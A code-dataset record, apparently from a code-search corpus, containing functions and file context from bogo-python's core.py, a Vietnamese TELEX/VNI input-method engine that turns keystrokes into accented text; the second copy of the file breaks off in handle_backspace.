elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps | Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L437-L466 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
    """Create a definition dictionary for the TELEX input method.

    Args:
        w_shorthand (optional): allow a stand-alone w to be
            interpreted as an ư. Default to True.
        brackets_shorthand (optional, True): allow typing ][ as
            shorthand for ươ. Default to True.

    Returns a dictionary to be passed into process_key().
    """
    w_effects = ["u*", "o*", "a+"]
    if w_shorthand:
        # A lone 'w' additionally types the character ư.
        w_effects.append('<ư')
    definition = {
        "a": "a^",
        "o": "o^",
        "e": "e^",
        "w": w_effects,
        "d": "d-",
        "f": "\\",
        "s": "/",
        "r": "?",
        "x": "~",
        "j": ".",
    }
    if brackets_shorthand:
        # ] and [ (and their shifted forms) type ư and ơ directly.
        definition["]"] = "<ư"
        definition["["] = "<ơ"
        definition["}"] = "<Ư"
        definition["{"] = "<Ơ"
    return definition
def get_vni_definition():
    """Create a definition dictionary for the VNI input method.

    Returns a dictionary to be passed into process_key().
    """
    definition = {}
    # Digits 6/7/8 place marks; 9 bars the d.
    definition["6"] = ["a^", "o^", "e^"]
    definition["7"] = ["u*", "o*"]
    definition["8"] = "a+"
    definition["9"] = "d-"
    # Digits 1-5 place the five tone accents.
    definition["2"] = "\\"
    definition["1"] = "/"
    definition["3"] = "?"
    definition["4"] = "~"
    definition["5"] = "."
    return definition
def _accepted_chars(rules):
    """Return the set of characters the engine consumes rather than
    treating as word separators: ASCII letters, every key bound in
    `rules`, the Vietnamese vowels, and 'đ'.
    """
    if sys.version_info[0] > 2:
        letters = string.ascii_letters
    else:
        # Python 2 fallback.
        letters = string.lowercase + string.uppercase
    chars = letters + ''.join(rules.keys()) + utils.VOWELS + "đ"
    return set(chars)
def process_sequence(sequence,
                     rules=None,
                     skip_non_vietnamese=True):
    """Convert a key sequence into a Vietnamese string with
    diacritical marks.

    Args:
        rules (optional): see docstring for process_key().
        skip_non_vietnamese (optional): see docstring for process_key().

    Continuous key sequences connected by separators are supported,
    i.e. process_sequence('con meof.ddieen') works.
    """
    if rules is None:
        rules = get_telex_definition()
    accepted = _accepted_chars(rules)
    parts = []
    current = ""
    raw = ""
    for key in sequence:
        if key in accepted:
            # Feed the key into the engine, carrying forward the
            # composed text and the raw fallback sequence.
            current, raw = process_key(
                string=current,
                key=key,
                fallback_sequence=raw,
                rules=rules,
                skip_non_vietnamese=skip_non_vietnamese)
        else:
            # A separator flushes the current word and is kept verbatim.
            parts.append(current)
            parts.append(key)
            current = ""
            raw = ""
    parts.append(current)
    return ''.join(parts)
def process_key(string, key,
                fallback_sequence="", rules=None,
                skip_non_vietnamese=True):
    """Process a keystroke.

    Args:
        string: The previously processed string or "".
        key: The keystroke.
        fallback_sequence: The previous raw (untransformed) keystrokes.
        rules (optional): A dictionary listing
            transformation rules. Defaults to get_telex_definition().
        skip_non_vietnamese (optional): Whether to skip results that
            don't seem like Vietnamese. Defaults to True.

    Returns a tuple. The first item of which is the processed
    Vietnamese string, the second item is the next fallback sequence.
    The two items are to be fed back into the next call of process_key()
    as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
    True and the resulting string doesn't look like Vietnamese,
    both items contain the `fallback_sequence`.

    >>> process_key('a', 'a', 'a')
    ('â', 'aa')

    Note that when a key acts as an undo key, it won't get appended to
    `fallback_sequence`.

    >>> process_key('â', 'a', 'aa')
    ('aa', 'aa')

    `rules` is a dictionary that maps keystrokes to
    their effect string. The effects can be one of the following:

    'a^': a with circumflex (â), only affects an existing 'a family'
    'a+': a with breve (ă), only affects an existing 'a family'
    'e^': e with circumflex (ê), only affects an existing 'e family'
    'o^': o with circumflex (ô), only affects an existing 'o family'
    'o*': o with horn (ơ), only affects an existing 'o family'
    'd-': d with bar (đ), only affects an existing 'd'
    '/': acute (sắc), affects an existing vowel
    '\\': grave (huyền), affects an existing vowel
    '?': hook (hỏi), affects an existing vowel
    '~': tilde (ngã), affects an existing vowel
    '.': dot (nặng), affects an existing vowel
    '<ư': append ư
    '<ơ': append ơ

    A keystroke entry can have multiple effects, in which case the
    dictionary entry's value should be a list of the possible
    effect strings. Although you should try to avoid this if
    you are defining a custom input method rule.
    """
    # TODO Figure out a way to remove the `string` argument. Perhaps only the
    # key sequence is needed?
    def default_return():
        # NOTE(review): currently unreachable (its only call site is
        # commented out below); kept for the disabled fast path.
        return string + key, fallback_sequence + key
    if rules is None:
        rules = get_telex_definition()
    # Split the composed word into its (initial consonant, vowel,
    # final consonant) components.
    comps = utils.separate(string)
    # if not _is_processable(comps):
    #     return default_return()
    # Find all possible transformations this keypress can generate
    trans_list = _get_transformation_list(
        key, rules, fallback_sequence)
    # Then apply them one by one
    new_comps = list(comps)
    for trans in trans_list:
        new_comps = _transform(new_comps, trans)
    if new_comps == comps:
        tmp = list(new_comps)
        # If none of the transformations (if any) work
        # then this keystroke is probably an undo key.
        if _can_undo(new_comps, trans_list):
            # The prefix "_" means undo.
            for trans in map(lambda x: "_" + x, trans_list):
                new_comps = _transform(new_comps, trans)
            # Undoing the w key with the TELEX input method with the
            # w:<ư extension requires some care.
            #
            # The input (ư, w) should be undone as w
            # on the other hand, (ư, uw) should return uw.
            #
            # _transform() is not aware of the 2 ways to generate
            # ư in TELEX and always thinks ư was created by uw.
            # Therefore, after calling _transform() to undo ư,
            # we always get ['', 'u', ''].
            #
            # So we have to clean it up a bit.
            def is_telex_like():
                return '<ư' in rules["w"]
            def undone_vowel_ends_with_u():
                return new_comps[1] and new_comps[1][-1].lower() == "u"
            def not_first_key_press():
                return len(fallback_sequence) >= 1
            def user_typed_ww():
                return (fallback_sequence[-1:]+key).lower() == "ww"
            def user_didnt_type_uww():
                return not (len(fallback_sequence) >= 2 and
                            fallback_sequence[-2].lower() == "u")
            if is_telex_like() and \
                    not_first_key_press() and \
                    undone_vowel_ends_with_u() and \
                    user_typed_ww() and \
                    user_didnt_type_uww():
                # The vowel part of new_comps is supposed to end with
                # u now. That u should be removed.
                new_comps[1] = new_comps[1][:-1]
        if tmp == new_comps:
            # Nothing was undone either, so the key is an ordinary
            # character: record it in the raw sequence too.
            fallback_sequence += key
        new_comps = utils.append_comps(new_comps, key)
    else:
        fallback_sequence += key
    if skip_non_vietnamese is True and key.isalpha() and \
            not is_valid_combination(new_comps, final_form=False):
        # Fall back to the raw key sequence for non-Vietnamese words.
        result = fallback_sequence, fallback_sequence
    else:
        result = utils.join(new_comps), fallback_sequence
    return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
    """Decode a transformation string into an (action, parameter) pair.

    An _Action.ADD_MARK comes with a Mark, an _Action.ADD_ACCENT with
    an Accent, an _Action.ADD_CHAR with the character to append, and an
    _Action.UNDO with the transformation to reverse.
    """
    # TODO: VIQR-like convention
    head = trans[0]
    if head in ('<', '+'):
        # '<x' / '+x': append the character x.
        return _Action.ADD_CHAR, trans[1]
    if head == "_":
        # '_t': undo the effect of transformation t.
        return _Action.UNDO, trans[1:]
    if len(trans) == 2:
        # Two-character transforms place a mark, e.g. 'a^', 'd-'.
        marks = {
            '^': Mark.HAT,
            '+': Mark.BREVE,
            '*': Mark.HORN,
            '-': Mark.BAR,
        }
        return _Action.ADD_MARK, marks[trans[1]]
    # Single-character transforms place a tone accent.
    accents = {
        '\\': Accent.GRAVE,
        '/': Accent.ACUTE,
        '?': Accent.HOOK,
        '~': Accent.TIDLE,
        '.': Accent.DOT,
    }
    return _Action.ADD_ACCENT, accents[head]
def _transform(comps, trans):
    """Apply transformation `trans` to the word components `comps` and
    return the new components.  `comps` itself is not mutated.
    """
    logging.debug("== In _transform(%s, %s) ==", comps, trans)
    components = list(comps)
    action, parameter = _get_action(trans)
    # Special case: 'o^' on a bare 'oe'/'oa' vowel (no final consonant)
    # appends an 'o' instead of placing a circumflex.
    if action == _Action.ADD_MARK and \
            components[2] == "" and \
            mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
        action, parameter = _Action.ADD_CHAR, trans[0]
    if action == _Action.ADD_ACCENT:
        logging.debug("add_accent(%s, %s)", components, parameter)
        components = accent.add_accent(components, parameter)
    elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
        logging.debug("add_mark(%s, %s)", components, parameter)
        components = mark.add_mark(components, parameter)
        # Handle uơ in "huơ", "thuở", "quở"
        # If the current word has no last consonant and the first consonant
        # is one of "h", "th" and the vowel is "ươ" then change the vowel into
        # "uơ", keeping case and accent. If an alphabet character is then added
        # into the word then change back to "ươ".
        #
        # NOTE: In the dictionary, these are the only words having this strange
        # vowel so we don't need to worry about other cases.
        if accent.remove_accent_string(components[1]).lower() == "ươ" and \
                not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
            # Backup accents
            ac = accent.get_accent_string(components[1])
            components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
            components = accent.add_accent(components, ac)
    elif action == _Action.ADD_CHAR:
        if trans[0] == "<":
            if not components[2]:
                # Only allow ư, ơ or ươ sitting alone in the middle part
                # and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
                # will create ['g', 'i', '']. Therefore we have to allow
                # components[1] == 'i'.
                if (components[0].lower(), components[1].lower()) == ('g', 'i'):
                    components[0] += components[1]
                    components[1] = ''
                if not components[1] or \
                        (components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
                    components[1] += trans[1]
        else:
            components = utils.append_comps(components, parameter)
            # Restore "ươ" when a new letter extends a word whose vowel
            # was temporarily rewritten as "uơ" (see the block above).
            if parameter.isalpha() and \
                    accent.remove_accent_string(components[1]).lower().startswith("uơ"):
                ac = accent.get_accent_string(components[1])
                components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
                    ('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
                components = accent.add_accent(components, ac)
    elif action == _Action.UNDO:
        components = _reverse(components, trans[1:])
    if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
        # If there is any accent, remove and reapply it
        # because it is likely to be misplaced in previous transformations
        ac = accent.get_accent_string(components[1])
        if ac != accent.Accent.NONE:
            components = accent.add_accent(components, Accent.NONE)
            components = accent.add_accent(components, ac)
    logging.debug("After transform: %s", components)
    return components
def _can_undo(comps, trans_list):
    """Return whether `comps` can be undone by one of the
    transformations in `trans_list`.
    """
    comps = list(comps)
    accents_present = [accent.get_accent_char(c) for c in comps[1]]
    marks_present = [mark.get_mark_char(c) for c in utils.join(comps)]
    actions = [_get_action(t) for t in trans_list]
    def produced_part_of(action):
        # True if `action` produced one of the accents, marks, or
        # appended characters (ơ, ư) visible in `comps`.
        kind, param = action
        if kind == _Action.ADD_ACCENT:
            return param in accents_present
        if kind == _Action.ADD_MARK:
            return param in marks_present
        if kind == _Action.ADD_CHAR:
            return param == accent.remove_accent_char(comps[1][-1])
        return False
    return any(produced_part_of(a) for a in actions)
def handle_backspace(converted_string, raw_sequence, im_rules=None):
    """Return a new raw_sequence after a backspace.  This raw_sequence
    should be pushed back to process_sequence() to rebuild the display
    string.

    Example (TELEX rules):

        handle_backspace(thương, thuwongw) -> thuwonw
        handle_backspace(thươn, thuwonw) -> thuwow
        handle_backspace(thươ, thuwow) -> thuw
        handle_backspace(thươ, thuw) -> th

    The algorithm for handle_backspace was contributed by @hainp.
    """
    # NOTE(review): idiomatic form would be `im_rules is None`; left
    # untouched in this documentation-only pass.
    if im_rules == None:
        im_rules = get_telex_definition()
    # The character the backspace removes from the converted string.
    deleted_char = converted_string[-1]
    _accent = accent.get_accent_char(deleted_char)
    _mark = mark.get_mark_char(deleted_char)
    if _mark or _accent:
        # The deleted character carries a diacritic, so several raw
        # keystrokes may have produced it.
        # Find a sequence of IM keys at the end of
        # raw_sequence
        ime_keys_at_end = ""
        len_raw_sequence = len(raw_sequence)
        i = len_raw_sequence - 1
        while i >= 0:
            if raw_sequence[i] not in im_rules and \
                    raw_sequence[i] not in "aeiouyd":
                # Stop at the first key that cannot take part in an IM
                # composition; `i` now points just past it.
                i += 1
                break
            else:
                ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
                i -= 1
        # NOTE(review): if every key in raw_sequence is an IM key, the
        # loop exhausts with i == -1, so the slice below starts from the
        # *last* character instead of index 0 — looks like an off-by-one;
        # confirm intended behavior before changing.
        # Try to find a subsequence from that sequence
        # that can be converted to the deleted_char
        k = 0
        while k < len_raw_sequence:
            if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
                # Delete that subsequence
                raw_sequence = raw_sequence[:i + k]
                break
            k += 1
    else:
        # Plain character: drop its last occurrence from the raw keys.
        index = raw_sequence.rfind(deleted_char)
        raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
    return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | _can_undo | python | def _can_undo(comps, trans_list):
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list)) | Return whether a components can be undone with one of the transformation in
trans_list. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L469-L489 | [
"def join(alist):\n return \"\".join(alist)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
    """Create a definition dictionary for the TELEX input method.

    Args:
        w_shorthand (optional): allow a stand-alone w to be
            interpreted as an ư. Default to True.
        brackets_shorthand (optional, True): allow typing ][ as
            shorthand for ươ. Default to True.

    Returns a dictionary to be passed into process_key().
    """
    w_effects = ["u*", "o*", "a+"]
    if w_shorthand:
        # A lone 'w' additionally types the character ư.
        w_effects.append('<ư')
    definition = {
        "a": "a^",
        "o": "o^",
        "e": "e^",
        "w": w_effects,
        "d": "d-",
        "f": "\\",
        "s": "/",
        "r": "?",
        "x": "~",
        "j": ".",
    }
    if brackets_shorthand:
        # ] and [ (and their shifted forms) type ư and ơ directly.
        definition["]"] = "<ư"
        definition["["] = "<ơ"
        definition["}"] = "<Ư"
        definition["{"] = "<Ơ"
    return definition
def get_vni_definition():
    """Create a definition dictionary for the VNI input method.

    Returns a dictionary to be passed into process_key().
    """
    definition = {}
    # Digits 6/7/8 place marks; 9 bars the d.
    definition["6"] = ["a^", "o^", "e^"]
    definition["7"] = ["u*", "o*"]
    definition["8"] = "a+"
    definition["9"] = "d-"
    # Digits 1-5 place the five tone accents.
    definition["2"] = "\\"
    definition["1"] = "/"
    definition["3"] = "?"
    definition["4"] = "~"
    definition["5"] = "."
    return definition
def _accepted_chars(rules):
    """Return the set of characters the engine consumes rather than
    treating as word separators: ASCII letters, every key bound in
    `rules`, the Vietnamese vowels, and 'đ'.
    """
    if sys.version_info[0] > 2:
        letters = string.ascii_letters
    else:
        # Python 2 fallback.
        letters = string.lowercase + string.uppercase
    chars = letters + ''.join(rules.keys()) + utils.VOWELS + "đ"
    return set(chars)
def process_sequence(sequence,
                     rules=None,
                     skip_non_vietnamese=True):
    """Convert a key sequence into a Vietnamese string with
    diacritical marks.

    Args:
        rules (optional): see docstring for process_key().
        skip_non_vietnamese (optional): see docstring for process_key().

    Continuous key sequences connected by separators are supported,
    i.e. process_sequence('con meof.ddieen') works.
    """
    if rules is None:
        rules = get_telex_definition()
    accepted = _accepted_chars(rules)
    parts = []
    current = ""
    raw = ""
    for key in sequence:
        if key in accepted:
            # Feed the key into the engine, carrying forward the
            # composed text and the raw fallback sequence.
            current, raw = process_key(
                string=current,
                key=key,
                fallback_sequence=raw,
                rules=rules,
                skip_non_vietnamese=skip_non_vietnamese)
        else:
            # A separator flushes the current word and is kept verbatim.
            parts.append(current)
            parts.append(key)
            current = ""
            raw = ""
    parts.append(current)
    return ''.join(parts)
def process_key(string, key,
                fallback_sequence="", rules=None,
                skip_non_vietnamese=True):
    """Process a keystroke.

    Args:
        string: The previously processed string or "".
        key: The keystroke.
        fallback_sequence: The previous raw (untransformed) keystrokes.
        rules (optional): A dictionary listing
            transformation rules. Defaults to get_telex_definition().
        skip_non_vietnamese (optional): Whether to skip results that
            don't seem like Vietnamese. Defaults to True.

    Returns a tuple. The first item of which is the processed
    Vietnamese string, the second item is the next fallback sequence.
    The two items are to be fed back into the next call of process_key()
    as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
    True and the resulting string doesn't look like Vietnamese,
    both items contain the `fallback_sequence`.

    >>> process_key('a', 'a', 'a')
    ('â', 'aa')

    Note that when a key acts as an undo key, it won't get appended to
    `fallback_sequence`.

    >>> process_key('â', 'a', 'aa')
    ('aa', 'aa')

    `rules` is a dictionary that maps keystrokes to
    their effect string. The effects can be one of the following:

    'a^': a with circumflex (â), only affects an existing 'a family'
    'a+': a with breve (ă), only affects an existing 'a family'
    'e^': e with circumflex (ê), only affects an existing 'e family'
    'o^': o with circumflex (ô), only affects an existing 'o family'
    'o*': o with horn (ơ), only affects an existing 'o family'
    'd-': d with bar (đ), only affects an existing 'd'
    '/': acute (sắc), affects an existing vowel
    '\\': grave (huyền), affects an existing vowel
    '?': hook (hỏi), affects an existing vowel
    '~': tilde (ngã), affects an existing vowel
    '.': dot (nặng), affects an existing vowel
    '<ư': append ư
    '<ơ': append ơ

    A keystroke entry can have multiple effects, in which case the
    dictionary entry's value should be a list of the possible
    effect strings. Although you should try to avoid this if
    you are defining a custom input method rule.
    """
    # TODO Figure out a way to remove the `string` argument. Perhaps only the
    # key sequence is needed?
    def default_return():
        # NOTE(review): currently unreachable (its only call site is
        # commented out below); kept for the disabled fast path.
        return string + key, fallback_sequence + key
    if rules is None:
        rules = get_telex_definition()
    # Split the composed word into its (initial consonant, vowel,
    # final consonant) components.
    comps = utils.separate(string)
    # if not _is_processable(comps):
    #     return default_return()
    # Find all possible transformations this keypress can generate
    trans_list = _get_transformation_list(
        key, rules, fallback_sequence)
    # Then apply them one by one
    new_comps = list(comps)
    for trans in trans_list:
        new_comps = _transform(new_comps, trans)
    if new_comps == comps:
        tmp = list(new_comps)
        # If none of the transformations (if any) work
        # then this keystroke is probably an undo key.
        if _can_undo(new_comps, trans_list):
            # The prefix "_" means undo.
            for trans in map(lambda x: "_" + x, trans_list):
                new_comps = _transform(new_comps, trans)
            # Undoing the w key with the TELEX input method with the
            # w:<ư extension requires some care.
            #
            # The input (ư, w) should be undone as w
            # on the other hand, (ư, uw) should return uw.
            #
            # _transform() is not aware of the 2 ways to generate
            # ư in TELEX and always thinks ư was created by uw.
            # Therefore, after calling _transform() to undo ư,
            # we always get ['', 'u', ''].
            #
            # So we have to clean it up a bit.
            def is_telex_like():
                return '<ư' in rules["w"]
            def undone_vowel_ends_with_u():
                return new_comps[1] and new_comps[1][-1].lower() == "u"
            def not_first_key_press():
                return len(fallback_sequence) >= 1
            def user_typed_ww():
                return (fallback_sequence[-1:]+key).lower() == "ww"
            def user_didnt_type_uww():
                return not (len(fallback_sequence) >= 2 and
                            fallback_sequence[-2].lower() == "u")
            if is_telex_like() and \
                    not_first_key_press() and \
                    undone_vowel_ends_with_u() and \
                    user_typed_ww() and \
                    user_didnt_type_uww():
                # The vowel part of new_comps is supposed to end with
                # u now. That u should be removed.
                new_comps[1] = new_comps[1][:-1]
        if tmp == new_comps:
            # Nothing was undone either, so the key is an ordinary
            # character: record it in the raw sequence too.
            fallback_sequence += key
        new_comps = utils.append_comps(new_comps, key)
    else:
        fallback_sequence += key
    if skip_non_vietnamese is True and key.isalpha() and \
            not is_valid_combination(new_comps, final_form=False):
        # Fall back to the raw key sequence for non-Vietnamese words.
        result = fallback_sequence, fallback_sequence
    else:
        result = utils.join(new_comps), fallback_sequence
    return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
    """Decode a transformation string into an (action, parameter) pair.

    An _Action.ADD_MARK comes with a Mark, an _Action.ADD_ACCENT with
    an Accent, an _Action.ADD_CHAR with the character to append, and an
    _Action.UNDO with the transformation to reverse.
    """
    # TODO: VIQR-like convention
    head = trans[0]
    if head in ('<', '+'):
        # '<x' / '+x': append the character x.
        return _Action.ADD_CHAR, trans[1]
    if head == "_":
        # '_t': undo the effect of transformation t.
        return _Action.UNDO, trans[1:]
    if len(trans) == 2:
        # Two-character transforms place a mark, e.g. 'a^', 'd-'.
        marks = {
            '^': Mark.HAT,
            '+': Mark.BREVE,
            '*': Mark.HORN,
            '-': Mark.BAR,
        }
        return _Action.ADD_MARK, marks[trans[1]]
    # Single-character transforms place a tone accent.
    accents = {
        '\\': Accent.GRAVE,
        '/': Accent.ACUTE,
        '?': Accent.HOOK,
        '~': Accent.TIDLE,
        '.': Accent.DOT,
    }
    return _Action.ADD_ACCENT, accents[head]
def _transform(comps, trans):
    """
    Apply the transformation `trans` to the word components `comps`.

    `comps` is assumed to be the [first consonant, vowel, last consonant]
    triple produced by utils.separate() -- TODO confirm against callers.
    Returns a new component list; `comps` itself is not mutated.
    """
    logging.debug("== In _transform(%s, %s) ==", comps, trans)
    components = list(comps)
    action, parameter = _get_action(trans)
    # An "o^" aimed at an "oe"/"oa" nucleus with no final consonant is
    # reinterpreted as appending a plain 'o' instead of adding a hat mark.
    if action == _Action.ADD_MARK and \
            components[2] == "" and \
            mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
        action, parameter = _Action.ADD_CHAR, trans[0]
    if action == _Action.ADD_ACCENT:
        logging.debug("add_accent(%s, %s)", components, parameter)
        components = accent.add_accent(components, parameter)
    elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
        logging.debug("add_mark(%s, %s)", components, parameter)
        components = mark.add_mark(components, parameter)
        # Handle uơ in "huơ", "thuở", "quở"
        # If the current word has no last consonant and the first consonant
        # is one of "h", "th" and the vowel is "ươ" then change the vowel into
        # "uơ", keeping case and accent. If an alphabet character is then added
        # into the word then change back to "ươ".
        #
        # NOTE: In the dictionary, these are the only words having this strange
        # vowel so we don't need to worry about other cases.
        if accent.remove_accent_string(components[1]).lower() == "ươ" and \
                not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
            # Backup accents
            ac = accent.get_accent_string(components[1])
            components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
            components = accent.add_accent(components, ac)
    elif action == _Action.ADD_CHAR:
        if trans[0] == "<":
            if not components[2]:
                # Only allow ư, ơ or ươ sitting alone in the middle part
                # and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
                # will create ['g', 'i', '']. Therefore we have to allow
                # components[1] == 'i'.
                if (components[0].lower(), components[1].lower()) == ('g', 'i'):
                    components[0] += components[1]
                    components[1] = ''
                if not components[1] or \
                        (components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
                    components[1] += trans[1]
        else:
            components = utils.append_comps(components, parameter)
            # The typed letter extends a "uơ" word (see the note above),
            # so the vowel is switched back to "ươ", preserving case and
            # the existing accent.
            if parameter.isalpha() and \
                    accent.remove_accent_string(components[1]).lower().startswith("uơ"):
                ac = accent.get_accent_string(components[1])
                components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
                    ('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
                components = accent.add_accent(components, ac)
    elif action == _Action.UNDO:
        components = _reverse(components, trans[1:])
    if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
        # If there is any accent, remove and reapply it
        # because it is likely to be misplaced in previous transformations
        ac = accent.get_accent_string(components[1])
        if ac != accent.Accent.NONE:
            components = accent.add_accent(components, Accent.NONE)
            components = accent.add_accent(components, ac)
    logging.debug("After transform: %s", components)
    return components
def _reverse(components, trans):
    """
    Undo the effect of the transformation `trans` on `components`.

    If the transformation does not affect the components, an unchanged
    copy of them is returned.
    """
    action, parameter = _get_action(trans)
    result = list(components)
    joined = utils.join(result)

    if action == _Action.ADD_CHAR and joined[-1].lower() == parameter.lower():
        # Strip the appended character from the right-most non-empty part.
        if result[2]:
            part = 2
        elif result[1]:
            part = 1
        else:
            part = 0
        result[part] = result[part][:-1]
    elif action == _Action.ADD_ACCENT:
        result = accent.add_accent(result, Accent.NONE)
    elif action == _Action.ADD_MARK:
        if parameter == Mark.BAR:
            # The bar mark sits on the final consonant of the first part
            # (d -> đ), so only that character is cleared.
            bare = mark.add_mark_char(result[0][-1:], Mark.NONE)
            result[0] = result[0][:-1] + bare
        elif mark.is_valid_mark(result, trans):
            # Clear the mark from every character of the vowel part.
            result[1] = "".join(
                mark.add_mark_char(c, Mark.NONE) for c in result[1])
    return result
def handle_backspace(converted_string, raw_sequence, im_rules=None):
    """
    Return a new raw key sequence after a backspace was pressed.

    Args:
        converted_string: the Vietnamese string currently displayed.
        raw_sequence: the raw keystrokes that produced it.
        im_rules (optional): the input-method definition; defaults to
            get_telex_definition().

    The returned sequence should be pushed back through
    process_sequence() to obtain the new display string.

    Examples (TELEX):

        handle_backspace(thương, thuwongw) -> thuwonw
        handle_backspace(thươn, thuwonw) -> thuwow
        handle_backspace(thươ, thuwow) -> thuw
        handle_backspace(thươ, thuw) -> th

    The algorithm for handle_backspace was contributed by @hainp.
    """
    if im_rules is None:
        im_rules = get_telex_definition()

    if not converted_string:
        # Nothing on screen to delete; return the raw sequence as is.
        return raw_sequence

